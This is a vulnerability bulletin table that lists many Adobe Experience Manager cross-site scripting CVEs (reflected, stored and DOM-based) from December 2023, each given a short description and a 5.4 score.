adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48495
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48496
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48497
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48498
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48499
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48500
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48501
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48502
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48503
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48504
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48505
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48506
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48507
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48508
[email protected]
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48509
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48510
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48511
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48512
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48513
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48514
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48515
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48516
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48517
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48518
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48519
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48520
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48521
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48522
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48523
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48524
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48525
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48526
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48527
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48528
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48529
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48530
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48531
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48532
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48533
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48534
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48535
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48536
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48537
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48538
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48539
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48540
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48541
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48542
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48543
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48544
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48545
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48546
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48547
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48548
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48549
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48550
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48551
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48552
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48553
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48554
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48555
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48556
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48557
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48558
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48559
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48560
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48561
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48562
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48563
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48564
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48565
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48566
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48567
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48568
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48569
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48570
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48571
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48572
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48573
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48574
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48575
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48576
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48577
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48578
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48579
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48580
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48581
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48582
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. | 2023-12-15 | 5.4 | CVE-2023-48583
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48584
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48585
adobe — experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. | 2023-12-15 | 5.4 | CVE-2023-48586
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48587
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.2023-12-155.4CVE-2023-48588
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48589
[email protected]
adobe — experience_managerAdobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser.2023-12-155.4CVE-2023-48590
[email protected]
